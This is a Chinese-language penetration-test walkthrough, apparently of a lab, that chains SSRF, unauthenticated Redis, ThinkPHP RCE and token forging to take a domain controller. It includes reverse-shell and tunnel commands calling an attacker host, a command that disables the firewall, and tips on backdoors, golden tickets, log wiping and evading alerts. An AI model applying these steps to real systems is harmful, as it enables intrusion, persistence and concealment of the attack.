SSRF→Redis→域控渗透全过程技术分析<\/h1>

0x00 环境概述<\/h2>

本次渗透测试模拟了一个典型的企业网络环境架构：<\/p>

网络拓扑<\/strong>：<\/p>

DMZ区：Linux服务器（运行Redis和Web服务），不在域内<\/li>
内网区：Windows Web服务器（ThinkPHP框架），已加入域<\/li>
域控服务器：192.168.138.138<\/li> <\/ul> <\/li>

初始攻击面<\/strong>：<\/p>

外网Web应用存在SSRF漏洞<\/li>
Redis服务存在未授权访问漏洞（版本5.0.9）<\/li>
内网Web应用存在ThinkPHP RCE漏洞<\/li> <\/ul> <\/li> <\/ul>
0x01 外网突破阶段<\/h2>
1. SSRF漏洞利用<\/h3>
关键步骤<\/strong>：<\/p>

发现Web应用存在无协议限制的SSRF漏洞<\/li>
通过SSRF探测本机端口，发现6379端口开放<\/li>
确认Redis服务存在未授权访问漏洞<\/li> <\/ol>
技术验证<\/strong>：<\/p>
ssrf.php?url=dict:\/\/127.0.0.1:6379\/info <\/span><\/span><\/span><\/code><\/pre>2. Redis未授权访问利用<\/h3> 攻击方法<\/strong>：<\/p> 使用Gopher协议构造Redis命令<\/li> 通过写计划任务实现反弹shell<\/li> <\/ol> 工具使用<\/strong>：<\/p> # 使用gopher-redis-auth生成攻击payload<\/span> <\/span><\/span>python gopher-redis-auth.py -h 127.0.0.1 -p 6379<\/span> -L [<\/span>攻击机IP]<\/span> -P [<\/span>监听端口]<\/span> -f redis.txt <\/span><\/span><\/code><\/pre>Shell升级<\/strong>：<\/p> # 目标机执行（哑Shell升级）<\/span> <\/span><\/span>python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>0x02 内网横向渗透<\/h2> 1. 内网隧道建立<\/h3> 工具选择<\/strong>：Venom多级代理工具<\/p> 实施步骤<\/strong>：<\/p> 在攻击机启动监听： .\/admin_linux_x64 -lport 9999<\/span> <\/span><\/span><\/code><\/pre><\/li> 目标机连接： .\/agent_linux_x64 -rhost [<\/span>VPS_IP]<\/span> -rport 9999<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 网络探测<\/strong>：<\/p> nmap -sS -Pn 192.168.135.0\/24 <\/span><\/span><\/code><\/pre>发现关键主机：192.168.135.150（内网Web服务器）<\/em><\/p> 2. ThinkPHP RCE利用<\/h3> 漏洞确认<\/strong>：<\/p> 框架识别：ThinkPHP<\/li> 存在已知RCE漏洞<\/li> <\/ul> 攻击实施<\/strong>：<\/p> 生成CS的Payload<\/li> 通过RCE下载执行，上线Web服务器<\/li> <\/ol> 权限提升<\/strong>：<\/p> # 使用MS14-058提权<\/span> <\/span><\/span>use exploit\/windows\/local\/ms14_058_track_popup_menu <\/span><\/span><\/code><\/pre>3. 域内信息收集<\/h3> 关键命令<\/strong>：<\/p> net group "Domain Admins"<\/span> \/domain # 查询域管理员 <\/span><\/span>arp -a # 查看ARP缓存 <\/span><\/span>ping DC01 # 确认域控IP <\/span><\/span><\/code><\/pre>发现结果<\/strong>：<\/p> 域控IP：192.168.138.138<\/li> 获取到域管理员明文密码<\/li> <\/ul> 0x03 域控攻陷<\/h2> 1. 权限伪造<\/h3> 攻击方法<\/strong>：<\/p> 使用已获取的域管理员凭证伪造Token<\/li> <\/ul> 2. 横向移动<\/h3> 实施步骤<\/strong>：<\/p> 在内网Web服务器设置中转监听<\/li> 通过CS的psexec模块远程执行Payload<\/li> 关闭域控防火墙： netsh advfirewall set allprofiles state off <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 权限维持<\/h3> 后门部署<\/strong>：<\/p> Linux主机：部署SSH后门<\/li> Windows主机：黄金票据+计划任务<\/li> <\/ol> 日志清理<\/strong>：<\/p> 清除Redis、Web、域控等各环节日志<\/li> <\/ul> 0x04 技术总结<\/h2> 攻击路径<\/h3> SSRF → Redis未授权访问 → 反弹Shell → 内网代理 → ThinkPHP RCE → 凭证窃取 → 域控攻陷 <\/code><\/pre> 关键点<\/h3> 协议利用<\/strong>：Gopher协议在SSRF中的灵活应用<\/li> 权限维持<\/strong>：Venom代理+CS双重通道<\/li> 横向移动<\/strong>：从非域主机→域内主机→域控的标准路径<\/li> 规避检测<\/strong>：全程无杀软环境下操作，真实环境需考虑免杀<\/li> <\/ol> 防御建议<\/h3> Redis服务应设置密码认证<\/li> 限制SSRF的协议类型和目标地址<\/li> 内网服务应及时修补已知漏洞（如ThinkPHP RCE）<\/li> 实施网络分段，限制域内横向移动<\/li> <\/ol> 0x05 工具列表<\/h2> Venom<\/strong>：https:\/\/github.com\/Dliv3\/Venom<\/a><\/p> 多级代理工具，支持多种协议和平台<\/li> <\/ul> <\/li> gopher-redis-auth<\/strong>：https:\/\/github.com\/LS95\/gopher-redis-auth<\/a><\/p> Gopher协议Payload生成工具<\/li> <\/ul> <\/li> Cobalt Strike<\/strong><\/p> 用于Payload生成、横向移动和权限维持<\/li> <\/ul> <\/li> Nmap<\/strong><\/p> 内网端口扫描和服务识别<\/li> <\/ul> <\/li> Metasploit<\/strong><\/p> 漏洞利用（MS14-058）和权限提升<\/li> <\/ul> <\/li> <\/ol> 附录：实战注意事项<\/h2> 扫描优化<\/strong>：<\/p> 避免通过Socks代理直接扫描，建议：将工具落地到目标机执行<\/li> 使用CS插件扫描<\/li> 采用低速率扫描避免触发告警<\/li> <\/ul> <\/li> <\/ul> <\/li> 时间控制<\/strong>：<\/p> Redis写文件操作需注意目标系统的时间设置<\/li> 计划任务执行时间需合理设置<\/li> <\/ul> <\/li> 痕迹清理<\/strong>：<\/p> Redis持久化文件清理<\/li> Windows事件日志清除<\/li> Web访问日志修改<\/li> <\/ul> <\/li> 备用通道<\/strong>：<\/p> 建议建立至少2种不同的持久化通道<\/li> 如：SSH后门+CS Beacon+计划任务<\/li> <\/ul> <\/li> <\/ol>